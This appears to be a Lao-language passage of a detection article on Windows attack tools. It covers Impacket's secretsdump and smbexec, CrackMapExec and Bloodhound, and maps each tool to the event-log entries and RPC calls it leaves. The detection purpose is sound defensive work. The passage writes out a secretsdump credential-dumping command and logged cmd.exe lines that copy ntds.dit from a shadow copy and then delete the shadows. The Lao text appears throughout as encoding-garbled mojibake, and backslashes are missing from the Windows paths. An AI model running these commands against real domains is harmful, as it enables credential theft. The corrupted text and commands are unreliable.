เบกเบฑเบ™เบ›เบฐเบเบปเบ”เบงเปˆเบฒเบเบดเบ”เบˆเบฐเบเปเบฒเบ”เบฑเปˆเบ‡เบเปˆเบฒเบงเบขเบนเปˆเปƒเบ™เป€เบ„เบทเบญเบ‚เปˆเบฒเบเบชเบฒเบกเบฒเบ”เบเบงเบ”เบžเบปเบšเป„เบ”เป‰เป‚เบ”เบเบเบฒเบ™เบชเบญเบšเบ–เบฒเบกเบเบฑเบšเบชเบฒเบ‚เบฒเบเบฒเบ™เบฅเบปเบ‡เบ—เบฐเบšเบฝเบ™เบšเบฒเบ‡เบขเปˆเบฒเบ‡เป‚เบ”เบเปƒเบŠเป‰เป‚เบ›เป‚เบ•เบ„เบญเบ™ winreg, เบŠเบทเปˆเบชเบฐเป€เบžเบฒเบฐ, เบ„เปเบฒเบชเบฑเปˆเบ‡เปเบฅเบฐเบ„เปเบฒเบชเบฑเปˆเบ‡เบ‚เบญเบ‡เบžเบงเบเป€เบ‚เบปเบฒ.

เป‚เบกเบ”เบนเบ™เบ™เบตเป‰เบเบฑเบ‡เบ›เปˆเบญเบเปƒเบซเป‰เบฎเปˆเบญเบ‡เบฎเบญเบเบขเบนเปˆเปƒเบ™เบšเบฑเบ™เบ—เบถเบเป€เบซเบ”เบเบฒเบ™ Windows, เป€เบฎเบฑเบ”เปƒเบซเป‰เบกเบฑเบ™เบ‡เปˆเบฒเบเบ•เปเปˆเบเบฒเบ™เบเบงเบ”เบžเบปเบš. เบ•เบปเบงเบขเปˆเบฒเบ‡, เป€เบ›เบฑเบ™เบœเบปเบ™เบกเบฒเบˆเบฒเบเบเบฒเบ™เบ›เบฐเบ•เบดเบšเบฑเบ”เบ„เปเบฒเบชเบฑเปˆเบ‡

secretsdump.py -debug -system SYSTEM -sam SAM -ntds NTDS -security SECURITY -bootkey BOOTKEY -outputfile 1.txt -use-vss -exec-method mmcexec -user-status -dc-ip 192.168.202.100 -target-ip 192.168.202.100 contoso/Administrator:@DC

เปƒเบ™เบšเบฑเบ™เบ—เบถเบเบ‚เบญเบ‡ Windows Server 2016 เบžเบงเบเป€เบฎเบปเบฒเบˆเบฐเป€เบซเบฑเบ™เบฅเปเบฒเบ”เบฑเบšเป€เบซเบ”เบเบฒเบ™เบชเปเบฒเบ„เบฑเบ™เบ•เปเปˆเป„เบ›เบ™เบตเป‰:

1. 4624 - remote Logon.
2. 5145 - เบเบฒเบ™เบเบงเบ”เบชเบญเบšเบชเบดเบ”เบเบฒเบ™เป€เบ‚เบปเป‰เบฒเป€เบ–เบดเบ‡เบเบฒเบ™เบšเปเบฅเบดเบเบฒเบ™เบ—เบฒเบ‡เป„เบ winreg.
3. 5145 - เบเบฒเบ™เบเบงเบ”เบชเบญเบšเบชเบดเบ”เบเบฒเบ™เป€เบ‚เบปเป‰เบฒเป€เบ–เบดเบ‡เป„เบŸเบฅเปŒเปƒเบ™เบฅเบฐเบšเบปเบš System32. เป„เบŸเบฅเปŒเบกเบตเบŠเบทเปˆเปเบšเบšเบชเบธเปˆเบกเบ—เบตเปˆเป„เบ”เป‰เบเปˆเบฒเบงเบกเบฒเบ‚เป‰เบฒเบ‡เป€เบ—เบดเบ‡.
4. 4688 - เบเบฒเบ™เบชเป‰เบฒเบ‡เบ‚เบฐเบšเบงเบ™เบเบฒเบ™ cmd.exe เบ—เบตเปˆเป€เบ›เบตเบ”เบ•เบปเบง vssadmin:

โ€œC:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

5. 4688 - เบเบฒเบ™เบชเป‰เบฒเบ‡เบ‚เบฐเบšเบงเบ™เบเบฒเบ™เบ”เป‰เบงเบเบ„เปเบฒเบชเบฑเปˆเบ‡:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin create shadow /For=C: ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

6. 4688 - เบเบฒเบ™เบชเป‰เบฒเบ‡เบ‚เบฐเบšเบงเบ™เบเบฒเบ™เบ”เป‰เบงเบเบ„เปเบฒเบชเบฑเปˆเบ‡:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy3WindowsNTDSntds.dit %SYSTEMROOT%TemprmumAfcn.tmp ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

7. 4688 - เบเบฒเบ™เบชเป‰เบฒเบ‡เบ‚เบฐเบšเบงเบ™เบเบฒเบ™เบ”เป‰เบงเบเบ„เปเบฒเบชเบฑเปˆเบ‡:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin delete shadows /For=C: /Quiet ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

Smbexec

เป€เบŠเบฑเปˆเบ™เบ”เบฝเบงเบเบฑเบ™เบเบฑเบšเป€เบ„เบทเปˆเบญเบ‡เบกเบทเบซเบผเบฑเบ‡เบเบฒเบ™เบ‚เบนเบ”เบฎเบตเบ”เบˆเปเบฒเบ™เบงเบ™เบซเบผเบฒเบ, Impacket เบกเบตเป‚เบกเบ”เบนเบ™เบชเปเบฒเบฅเบฑเบšเบเบฒเบ™เบ›เบฐเบ•เบดเบšเบฑเบ”เบ„เปเบฒเบชเบฑเปˆเบ‡เบซเปˆเบฒเบ‡เป„เบเบชเบญเบเบซเบผเบตเบ. เบžเบงเบเป€เบฎเบปเบฒเบˆเบฐเบชเบธเบกเปƒเบชเปˆ smbexec, เป€เบŠเบดเปˆเบ‡เบชเบฐเบซเบ™เบญเบ‡ shell เบ„เปเบฒเบชเบฑเปˆเบ‡เบเบฒเบ™เป‚เบ•เป‰เบ•เบญเบšเปƒเบ™เป€เบ„เบทเปˆเบญเบ‡เบซเปˆเบฒเบ‡เป„เบเบชเบญเบเบซเบผเบตเบ. เป‚เบกเบ”เบนเบ™เบ™เบตเป‰เบเบฑเบ‡เบ•เป‰เบญเบ‡เบเบฒเบ™เบเบฒเบ™เบžเบดเบชเบนเบ”เบขเบทเบ™เบขเบฑเบ™เบœเปˆเบฒเบ™ SMB, เบšเปเปˆเบงเปˆเบฒเบˆเบฐเป€เบ›เบฑเบ™เบฅเบฐเบซเบฑเบ”เบœเปˆเบฒเบ™เบซเบผเบท hash เบฅเบฐเบซเบฑเบ”เบœเปˆเบฒเบ™. เปƒเบ™เบฎเบนเบš. เปƒเบ™เบฎเบนเบšเบ—เบต 3 เบžเบงเบเป€เบฎเบปเบฒเป€เบซเบฑเบ™เบ•เบปเบงเบขเปˆเบฒเบ‡เบ‚เบญเบ‡เบงเบดเบ—เบตเบเบฒเบ™เป€เบฎเบฑเบ”เบงเบฝเบเบ‚เบญเบ‡เป€เบ„เบทเปˆเบญเบ‡เบกเบทเบ”เบฑเปˆเบ‡เบเปˆเบฒเบง, เปƒเบ™เบเปเบฅเบฐเบ™เบตเบ™เบตเป‰เบกเบฑเบ™เปเบกเปˆเบ™ console เบ‚เบญเบ‡เบœเบนเป‰เบšเปเบฅเบดเบซเบฒเบ™เบ—เป‰เบญเบ‡เบ–เบดเปˆเบ™.

เบงเบดเบ—เบตเบเบฒเบ™เบเบงเบ”เบžเบปเบšเบเบฒเบ™เป‚เบˆเบกเบ•เบตเปƒเบ™เป‚เบ„เบ‡เบชเป‰เบฒเบ‡เบžเบทเป‰เบ™เบ–เบฒเบ™เบ‚เบญเบ‡ Windows: เบเบฒเบ™เบชเบถเบเบชเบฒเป€เบ„เบทเปˆเบญเบ‡เบกเบทเปเบฎเบเป€เบเบต
เป€เบ‚เบปเป‰เบฒ. 3. Interactive smbexec console

เบ‚เบฑเป‰เบ™เบ•เบญเบ™เบ—เปเบฒเบญเบดเบ”เบ‚เบญเบ‡ smbexec เบซเบผเบฑเบ‡เบˆเบฒเบเบเบฒเบ™เบžเบดเบชเบนเบ”เบขเบทเบ™เบขเบฑเบ™เปเบกเปˆเบ™เป€เบžเบทเปˆเบญเป€เบ›เบตเบ” SCM เบ”เป‰เบงเบเบ„เปเบฒเบชเบฑเปˆเบ‡ OpenSCManagerW (15). เบเบฒเบ™เบชเบญเบšเบ–เบฒเบกเปเบกเปˆเบ™เบซเบ™เป‰เบฒเบชเบฑเบ‡เป€เบเบ”: เบžเบฒเบเบชเบฐเบซเบ™เบฒเบก MachineName เปเบกเปˆเบ™ DUMMY.

เบงเบดเบ—เบตเบเบฒเบ™เบเบงเบ”เบžเบปเบšเบเบฒเบ™เป‚เบˆเบกเบ•เบตเปƒเบ™เป‚เบ„เบ‡เบชเป‰เบฒเบ‡เบžเบทเป‰เบ™เบ–เบฒเบ™เบ‚เบญเบ‡ Windows: เบเบฒเบ™เบชเบถเบเบชเบฒเป€เบ„เบทเปˆเบญเบ‡เบกเบทเปเบฎเบเป€เบเบต
เป€เบ‚เบปเป‰เบฒ. 4. เบฎเป‰เบญเบ‡เบ‚เปเปƒเบซเป‰เป€เบ›เบตเบ” Service Control Manager

เบ•เปเปˆเป„เบ›, เบเบฒเบ™เบšเปเบฅเบดเบเบฒเบ™เบ–เบทเบเบชเป‰เบฒเบ‡เบ‚เบทเป‰เบ™เป‚เบ”เบเปƒเบŠเป‰เบ„เปเบฒเบชเบฑเปˆเบ‡ CreateServiceW (12). เปƒเบ™เบเปเบฅเบฐเบ™เบตเบ‚เบญเบ‡ smbexec, เบžเบงเบเป€เบฎเบปเบฒเบชเบฒเบกเบฒเบ”เป€เบซเบฑเบ™เป€เบซเบ”เบœเบปเบ™เบเบฒเบ™เบเปเปˆเบชเป‰เบฒเบ‡เบ„เปเบฒเบชเบฑเปˆเบ‡เบ”เบฝเบงเบเบฑเบ™เบ—เบธเบเบ„เบฑเป‰เบ‡. เปƒเบ™เบฎเบนเบš. 5 เบชเบตเบ‚เบฝเบงเบชเบฐเปเบ”เบ‡เป€เบ–เบดเบ‡เบ•เบปเบงเบเปเบฒเบ™เบปเบ”เบ„เปเบฒเบชเบฑเปˆเบ‡เบ—เบตเปˆเบšเปเปˆเบชเบฒเบกเบฒเบ”เบ›เปˆเบฝเบ™เปเบ›เบ‡เป„เบ”เป‰, เบชเบตเป€เบซเบผเบทเบญเบ‡เบŠเบตเป‰เปƒเบซเป‰เป€เบซเบฑเบ™เป€เบ–เบดเบ‡เบชเบดเปˆเบ‡เบ—เบตเปˆเบœเบนเป‰เป‚เบˆเบกเบ•เบตเบชเบฒเบกเบฒเบ”เบ›เปˆเบฝเบ™เปเบ›เบ‡เป„เบ”เป‰. เบกเบฑเบ™เบ‡เปˆเบฒเบเบ—เบตเปˆเบˆเบฐเป€เบซเบฑเบ™เบงเปˆเบฒเบŠเบทเปˆเบ‚เบญเบ‡เป„เบŸเบฅเปŒเบ—เบตเปˆเบชเบฒเบกเบฒเบ”เบ›เบฐเบ•เบดเบšเบฑเบ”เป„เบ”เป‰, เป„เบ”เป€เบฅเบเบฐเบ—เปเบฅเบตเบ‚เบญเบ‡เบกเบฑเบ™เปเบฅเบฐเป„เบŸเบฅเปŒเบœเบปเบ™เบœเบฐเบฅเบดเบ”เบชเบฒเบกเบฒเบ”เบ›เปˆเบฝเบ™เปเบ›เบ‡เป„เบ”เป‰, เปเบ•เปˆเบชเปˆเบงเบ™เบ—เบตเปˆเป€เบซเบผเบทเบญเปเบกเปˆเบ™เบกเบตเบ„เบงเบฒเบกเบซเบเบธเป‰เบ‡เบเบฒเบเบซเบผเบฒเบเบ—เบตเปˆเบˆเบฐเบ›เปˆเบฝเบ™เป‚เบ”เบเบšเปเปˆเบกเบตเบเบฒเบ™เบฅเบปเบšเบเบงเบ™เป€เบซเบ”เบœเบปเบ™เบ‚เบญเบ‡เป‚เบกเบ”เบนเบ™ Impacket.

เบงเบดเบ—เบตเบเบฒเบ™เบเบงเบ”เบžเบปเบšเบเบฒเบ™เป‚เบˆเบกเบ•เบตเปƒเบ™เป‚เบ„เบ‡เบชเป‰เบฒเบ‡เบžเบทเป‰เบ™เบ–เบฒเบ™เบ‚เบญเบ‡ Windows: เบเบฒเบ™เบชเบถเบเบชเบฒเป€เบ„เบทเปˆเบญเบ‡เบกเบทเปเบฎเบเป€เบเบต
เป€เบ‚เบปเป‰เบฒ. 5. เบฎเป‰เบญเบ‡เบ‚เปเปƒเบซเป‰เบชเป‰เบฒเบ‡เบšเปเบฅเบดเบเบฒเบ™เป‚เบ”เบเปƒเบŠเป‰ Service Control Manager

Smbexec เบเบฑเบ‡เบ›เปˆเบญเบเปƒเบซเป‰เบฎเปˆเบญเบ‡เบฎเบญเบเบ—เบตเปˆเบŠเบฑเบ”เป€เบˆเบ™เบขเบนเปˆเปƒเบ™เบšเบฑเบ™เบ—เบถเบเป€เบซเบ”เบเบฒเบ™ Windows. เปƒเบ™เบšเบฑเบ™เบ—เบถเบเบ‚เบญเบ‡ Windows Server 2016 เบชเปเบฒเบฅเบฑเบšเปเบเบฐเบ„เปเบฒเบชเบฑเปˆเบ‡เปเบšเบšเป‚เบ•เป‰เบ•เบญเบšเบเบฑเบšเบ„เปเบฒเบชเบฑเปˆเบ‡ ipconfig, เบžเบงเบเป€เบฎเบปเบฒเบˆเบฐเป€เบซเบฑเบ™เบฅเปเบฒเบ”เบฑเบšเป€เบซเบ”เบเบฒเบ™เบชเปเบฒเบ„เบฑเบ™เบ•เปเปˆเป„เบ›เบ™เบตเป‰:

1. 4697 โ€” เบเบฒเบ™โ€‹เบ•เบดเบ”โ€‹เบ•เบฑเป‰เบ‡โ€‹เบเบฒเบ™โ€‹เบšเปโ€‹เบฅเบดโ€‹เบเบฒเบ™โ€‹เปƒเบ™โ€‹เป€เบ„เบทเปˆเบญเบ‡โ€‹เบ‚เบญเบ‡โ€‹เบœเบนเป‰โ€‹เป€เบ„เบฒเบฐโ€‹เบฎเป‰เบฒเบโ€‹:

%COMSPEC% /Q /c echo cd ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

2. 4688 - เบเบฒเบ™เบชเป‰เบฒเบ‡เบ‚เบฐเบšเบงเบ™เบเบฒเบ™ cmd.exe เบ”เป‰เบงเบเบเบฒเบ™เป‚เบ•เป‰เบ–เบฝเบ‡เบˆเบฒเบเบˆเบธเบ” 1.
3. 5145 - เบเบฒเบ™เบเบงเบ”เบชเบญเบšเบชเบดเบ”เบเบฒเบ™เป€เบ‚เบปเป‰เบฒเป€เบ–เบดเบ‡เป„เบŸเบฅเปŒ __output เปƒเบ™เป„เบ”เป€เบฅเบเบฐเบ—เปเบฅเบต C$.
4. 4697 โ€” เบเบฒเบ™โ€‹เบ•เบดเบ”โ€‹เบ•เบฑเป‰เบ‡โ€‹เบเบฒเบ™โ€‹เบšเปโ€‹เบฅเบดโ€‹เบเบฒเบ™โ€‹เปƒเบ™โ€‹เป€เบ„เบทเปˆเบญเบ‡โ€‹เบ‚เบญเบ‡โ€‹เบœเบนเป‰โ€‹เบ–เบทเบโ€‹เป€เบ„เบฒเบฐโ€‹เบฎเป‰เบฒเบโ€‹.

%COMSPEC% /Q /c echo ipconfig ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

5. 4688 - เบเบฒเบ™เบชเป‰เบฒเบ‡เบ‚เบฐเบšเบงเบ™เบเบฒเบ™ cmd.exe เบ”เป‰เบงเบเบเบฒเบ™เป‚เบ•เป‰เบ–เบฝเบ‡เบˆเบฒเบเบˆเบธเบ” 4.
6. 5145 - เบเบฒเบ™เบเบงเบ”เบชเบญเบšเบชเบดเบ”เบเบฒเบ™เป€เบ‚เบปเป‰เบฒเป€เบ–เบดเบ‡เป„เบŸเบฅเปŒ __output เปƒเบ™เป„เบ”เป€เบฅเบเบฐเบ—เปเบฅเบต C$.

Impacket เปเบกเปˆเบ™เบžเบทเป‰เบ™เบ–เบฒเบ™เบชเปเบฒเบฅเบฑเบšเบเบฒเบ™เบžเบฑเบ”เบ—เบฐเบ™เบฒเป€เบ„เบทเปˆเบญเบ‡เบกเบทเบเบฒเบ™เป‚เบˆเบกเบ•เบต. เบกเบฑเบ™เบชเบฐเบซเบ™เบฑเบšเบชเบฐเบซเบ™เบนเบ™เป€เบเบทเบญเบšเบ—เบธเบเป‚เบ›เป‚เบ•เบ„เบญเบ™เปƒเบ™เป‚เบ„เบ‡เบชเป‰เบฒเบ‡เบžเบทเป‰เบ™เบ–เบฒเบ™เบ‚เบญเบ‡ Windows เปเบฅเบฐเปƒเบ™เป€เบงเบฅเบฒเบ”เบฝเบงเบเบฑเบ™เบกเบตเบฅเบฑเบเบชเบฐเบ™เบฐเบฅเบฑเบเบชเบฐเบ™เบฐเบ‚เบญเบ‡เบ•เบปเบ™เป€เบญเบ‡. เบ™เบตเป‰เปเบกเปˆเบ™เบ„เปเบฒเบฎเป‰เบญเบ‡เบ‚เป winreg เบชเบฐเป€เบžเบฒเบฐ, เปเบฅเบฐเบเบฒเบ™เบ™เปเบฒเปƒเบŠเป‰ SCM API เบเบฑเบšเบเบฒเบ™เบชเป‰เบฒเบ‡เบ„เปเบฒเบชเบฑเปˆเบ‡เบฅเบฑเบเบชเบฐเบ™เบฐ, เปเบฅเบฐเบฎเบนเบšเปเบšเบšเบŠเบทเปˆเป„เบŸเบฅเปŒ, เปเบฅเบฐ SMB เปเบšเปˆเบ‡เบ›เบฑเบ™ SYSTEM32.

CRACKMAPEXEC

เป€เบ„เบทเปˆเบญเบ‡เบกเบท CME เป„เบ”เป‰เบ–เบทเบเบญเบญเบเปเบšเบšเบ•เบปเป‰เบ™เบ•เปเป€เบžเบทเปˆเบญเบญเบฑเบ”เบ•เบฐเป‚เบ™เบกเบฑเบ”เบเบฒเบ™เบ›เบฐเบ•เบดเบšเบฑเบ”เบ›เบปเบเบเบฐเบ•เบดเป€เบซเบผเบปเปˆเบฒเบ™เบฑเป‰เบ™เบ—เบตเปˆเบœเบนเป‰เป‚เบˆเบกเบ•เบตเบ•เป‰เบญเบ‡เป€เบฎเบฑเบ”เป€เบžเบทเปˆเบญเบเป‰เบฒเบงเบซเบ™เป‰เบฒเบžเบฒเบเปƒเบ™เป€เบ„เบทเบญเบ‚เปˆเบฒเบ. เบกเบฑเบ™เบญเบฐเบ™เบธเบเบฒเบ”เปƒเบซเป‰เบ—เปˆเบฒเบ™เป€เบฎเบฑเบ”เบงเบฝเบเบฎเปˆเบงเบกเบเบฑเบ™เบเบฑเบšเบ•เบปเบงเปเบ—เบ™ Empire เบ—เบตเปˆเบกเบตเบŠเบทเปˆเบชเบฝเบ‡เปเบฅเบฐ Meterpreter. เป€เบžเบทเปˆเบญเบ›เบฐเบ•เบดเบšเบฑเบ”เบ„เปเบฒเบชเบฑเปˆเบ‡เบฅเบฑเบšเป†, CME เบชเบฒเบกเบฒเบ”เป€เบฎเบฑเบ”เปƒเบซเป‰เบžเบงเบเป€เบ‚เบปเบฒเบชเบฑเบšเบชเบปเบ™. เบเบฒเบ™เบ™เปเบฒเปƒเบŠเป‰ Bloodhound (เป€เบ„เบทเปˆเบญเบ‡เบกเบทเบเบฒเบ™เบชเบญเบ”เปเบ™เบกเปเบเบเบ•เปˆเบฒเบ‡เบซเบฒเบ), เบœเบนเป‰เป‚เบˆเบกเบ•เบตเบชเบฒเบกเบฒเบ”เบญเบฑเบ”เบ•เบฐเป‚เบ™เบกเบฑเบ”เบเบฒเบ™เบ„เบปเป‰เบ™เบซเบฒเบชเปเบฒเบฅเบฑเบšเบเบญเบ‡เบ›เบฐเบŠเบธเบกเบœเบนเป‰เป€เบšเบดเปˆเบ‡เปเบเบ‡เป‚เบ”เป€เบกเบ™เบ—เบตเปˆเบกเบตเบเบฒเบ™เป€เบ„เบทเปˆเบญเบ™เป„เบซเบง.

เบเบฒเบ™เบ™เบญเบ‡เป€เบฅเบทเบญเบ”

Bloodhound, เป€เบ›เบฑเบ™เป€เบ„เบทเปˆเบญเบ‡เบกเบท standalone, เบญเบฐเบ™เบธเบเบฒเบ”เปƒเบซเป‰เบชเปเบฒเบฅเบฑเบšเบเบฒเบ™ reconnaissance เบเป‰เบฒเบงเบซเบ™เป‰เบฒเบ—เบฒเบ‡เบ”เป‰เบฒเบ™เปƒเบ™เป€เบ„เบทเบญเบ‚เปˆเบฒเบ. เบกเบฑเบ™เบฅเบงเบšเบฅเบงเบกเบ‚เปเป‰เบกเบนเบ™เบเปˆเบฝเบงเบเบฑเบšเบœเบนเป‰เปƒเบŠเป‰, เป€เบ„เบทเปˆเบญเบ‡เบˆเบฑเบ, เบเบธเปˆเบก, เป€เบŠเบ”เบŠเบฑเบ™ เปเบฅเบฐเบ–เบทเบเบชเบฐเปœเบญเบ‡เปƒเบซเป‰เป€เบ›เบฑเบ™ PowerShell script เบซเบผเบท binary file. LDAP เบซเบผเบท SMB-based protocols เบ–เบทเบเบ™เปเบฒเปƒเบŠเป‰เป€เบžเบทเปˆเบญเป€เบเบฑเบšเบเปเบฒเบ‚เปเป‰เบกเบนเบ™. เป‚เบกเบ”เบนเบ™เบเบฒเบ™เบฅเบงเบกเบ•เบปเบง CME เบญเบฐเบ™เบธเบเบฒเบ”เปƒเบซเป‰ Bloodhound เบ”เบฒเบงเป‚เบซเบผเบ”เปƒเบชเปˆเป€เบ„เบทเปˆเบญเบ‡เบ‚เบญเบ‡เบœเบนเป‰เป€เบ„เบฒเบฐเบฎเป‰เบฒเบ, เปเบฅเปˆเบ™เปเบฅเบฐเบฎเบฑเบšเบ‚เปเป‰เบกเบนเบ™เบ—เบตเปˆเป€เบเบฑเบšเบเปเบฒเบซเบผเบฑเบ‡เบˆเบฒเบเบเบฒเบ™เบ›เบฐเบ•เบดเบšเบฑเบ”, เบ”เบฑเปˆเบ‡เบ™เบฑเป‰เบ™เบเบฒเบ™เบ”เปเบฒเป€เบ™เบตเบ™เบเบฒเบ™เบญเบฑเบ”เบ•เบฐเป‚เบ™เบกเบฑเบ”เปƒเบ™เบฅเบฐเบšเบปเบšเปเบฅเบฐเป€เบฎเบฑเบ”เปƒเบซเป‰เบžเบงเบเป€เบ‚เบปเบฒเบชเบฑเบ‡เป€เบเบ”เป€เบซเบฑเบ™เบซเบ™เป‰เบญเบเบฅเบปเบ‡. เปเบเบฐเบเบฒเบŸเบดเบ Bloodhound เบ™เปเบฒเบชเบฐเป€เบซเบ™เบตเบ‚เปเป‰เบกเบนเบ™เบ—เบตเปˆเป€เบเบฑเบšเบเปเบฒเปƒเบ™เบฎเบนเบšเปเบšเบšเบ‚เบญเบ‡เบเบฒเบŸ, เป€เบŠเบดเปˆเบ‡เบŠเปˆเบงเบเปƒเบซเป‰เบ—เปˆเบฒเบ™เบชเบฒเบกเบฒเบ”เบŠเบญเบเบซเบฒเป€เบชเบฑเป‰เบ™เบ—เบฒเบ‡เบ—เบตเปˆเบชเบฑเป‰เบ™เบ—เบตเปˆเบชเบธเบ”เบˆเบฒเบเป€เบ„เบทเปˆเบญเบ‡เบ‚เบญเบ‡เบœเบนเป‰เป‚เบˆเบกเบ•เบตเป„เบ›เบซเบฒเบœเบนเป‰เป€เบšเบดเปˆเบ‡เปเบเบ‡เป‚เบ”เป€เบกเบ™.

เบงเบดเบ—เบตเบเบฒเบ™เบเบงเบ”เบžเบปเบšเบเบฒเบ™เป‚เบˆเบกเบ•เบตเปƒเบ™เป‚เบ„เบ‡เบชเป‰เบฒเบ‡เบžเบทเป‰เบ™เบ–เบฒเบ™เบ‚เบญเบ‡ Windows: เบเบฒเบ™เบชเบถเบเบชเบฒเป€เบ„เบทเปˆเบญเบ‡เบกเบทเปเบฎเบเป€เบเบต
เป€เบ‚เบปเป‰เบฒ. 6. เบเบฒเบ™เป‚เบ•เป‰เบ•เบญเบš Bloodhound

เป€เบžเบทเปˆเบญเบ”เปเบฒเป€เบ™เบตเบ™เบเบฒเบ™เบขเบนเปˆเปƒเบ™เป€เบ„เบทเปˆเบญเบ‡เบ‚เบญเบ‡เบœเบนเป‰เบ–เบทเบเป€เบ„เบฒเบฐเบฎเป‰เบฒเบ, เป‚เบกเบ”เบนเบ™เบˆเบฐเบชเป‰เบฒเบ‡เบงเบฝเบเบ‡เบฒเบ™เป‚เบ”เบเปƒเบŠเป‰ ATSVC เปเบฅเบฐ SMB. ATSVC เปเบกเปˆเบ™เบเบฒเบ™เป‚เบ•เป‰เบ•เบญเบšเบชเปเบฒเบฅเบฑเบšเบเบฒเบ™เป€เบฎเบฑเบ”เบงเบฝเบเบเบฑเบš Windows Task Scheduler. CME เปƒเบŠเป‰เบŸเบฑเบ‡เบŠเบฑเบ™ NetrJobAdd(1) เป€เบžเบทเปˆเบญเบชเป‰เบฒเบ‡เบงเบฝเบเบœเปˆเบฒเบ™เป€เบ„เบทเบญเบ‚เปˆเบฒเบ. เบ•เบปเบงเบขเปˆเบฒเบ‡เบ‚เบญเบ‡เบชเบดเปˆเบ‡เบ—เบตเปˆเป‚เบกเบ”เบนเบ™ CME เบชเบปเปˆเบ‡เปเบกเปˆเบ™เบชเบฐเปเบ”เบ‡เบขเบนเปˆเปƒเบ™เบฎเบนเบš. 7: เบ™เบตเป‰เปเบกเปˆเบ™เบเบฒเบ™เป€เบญเบตเป‰เบ™เบ„เปเบฒเบชเบฑเปˆเบ‡ cmd.exe เปเบฅเบฐเบฅเบฐเบซเบฑเบ” obfuscated เปƒเบ™เบฎเบนเบšเปเบšเบšเบเบฒเบ™เป‚เบ•เป‰เบ–เบฝเบ‡เปƒเบ™เบฎเบนเบšเปเบšเบš XML.

เบงเบดเบ—เบตเบเบฒเบ™เบเบงเบ”เบžเบปเบšเบเบฒเบ™เป‚เบˆเบกเบ•เบตเปƒเบ™เป‚เบ„เบ‡เบชเป‰เบฒเบ‡เบžเบทเป‰เบ™เบ–เบฒเบ™เบ‚เบญเบ‡ Windows: เบเบฒเบ™เบชเบถเบเบชเบฒเป€เบ„เบทเปˆเบญเบ‡เบกเบทเปเบฎเบเป€เบเบต
Fig.7. เบชเป‰เบฒเบ‡เปœเป‰เบฒเบงเบฝเบเบœเปˆเบฒเบ™ CME

เบซเบผเบฑเบ‡เบˆเบฒเบเบงเบฝเบเบ‡เบฒเบ™เป„เบ”เป‰เบ–เบทเบเบชเบปเปˆเบ‡เป€เบžเบทเปˆเบญเบ›เบฐเบ•เบดเบšเบฑเบ”, เป€เบ„เบทเปˆเบญเบ‡เบ‚เบญเบ‡เบœเบนเป‰เบ–เบทเบเป€เบ„เบฒเบฐเบฎเป‰เบฒเบเป€เบฅเบตเปˆเบกเบ•เบปเป‰เบ™ Bloodhound เบ•เบปเบงเบ‚เบญเบ‡เบกเบฑเบ™เป€เบญเบ‡, เปเบฅเบฐเบ™เบตเป‰เบชเบฒเบกเบฒเบ”เป€เบซเบฑเบ™เป„เบ”เป‰เปƒเบ™เบเบฒเบ™เบˆเบฐเบฅเบฒเบˆเบญเบ™. เป‚เบกเบ”เบนเบ™เปเบกเปˆเบ™เบกเบตเบฅเบฑเบเบชเบฐเบ™เบฐเป‚เบ”เบเบเบฒเบ™เบชเบญเบšเบ–เบฒเบก LDAP เป€เบžเบทเปˆเบญเปƒเบซเป‰เป„เบ”เป‰เบฎเบฑเบšเบเบธเปˆเบกเบกเบฒเบ”เบ•เบฐเบ–เบฒเบ™, เบšเบฑเบ™เบŠเบตเบฅเบฒเบเบŠเบทเปˆเบ‚เบญเบ‡เป€เบ„เบทเปˆเบญเบ‡เบˆเบฑเบเปเบฅเบฐเบœเบนเป‰เปƒเบŠเป‰เบ—เบฑเบ‡เบซเบกเบปเบ”เปƒเบ™เป‚เบ”เป€เบกเบ™, เปเบฅเบฐเป„เบ”เป‰เบฎเบฑเบšเบ‚เปเป‰เบกเบนเบ™เบเปˆเบฝเบงเบเบฑเบšเบเบญเบ‡เบ›เบฐเบŠเบธเบกเบœเบนเป‰เปƒเบŠเป‰เบ—เบตเปˆเบกเบตเบเบฒเบ™เป€เบ„เบทเปˆเบญเบ™เป„เบซเบงเป‚เบ”เบเบœเปˆเบฒเบ™เบ„เปเบฒเบฎเป‰เบญเบ‡เบ‚เป SRVSVC NetSessEnum.

เบงเบดเบ—เบตเบเบฒเบ™เบเบงเบ”เบžเบปเบšเบเบฒเบ™เป‚เบˆเบกเบ•เบตเปƒเบ™เป‚เบ„เบ‡เบชเป‰เบฒเบ‡เบžเบทเป‰เบ™เบ–เบฒเบ™เบ‚เบญเบ‡ Windows: เบเบฒเบ™เบชเบถเบเบชเบฒเป€เบ„เบทเปˆเบญเบ‡เบกเบทเปเบฎเบเป€เบเบต
เป€เบ‚เบปเป‰เบฒ. 8. เป„เบ”เป‰เบฎเบฑเบšเบšเบฑเบ™เบŠเบตเบฅเบฒเบเบŠเบทเปˆเบ‚เบญเบ‡เบเบญเบ‡เบ›เบฐเบŠเบธเบกเบ—เบตเปˆเบกเบตเบเบฒเบ™เป€เบ„เบทเปˆเบญเบ™เป„เบซเบงเบœเปˆเบฒเบ™ SMB

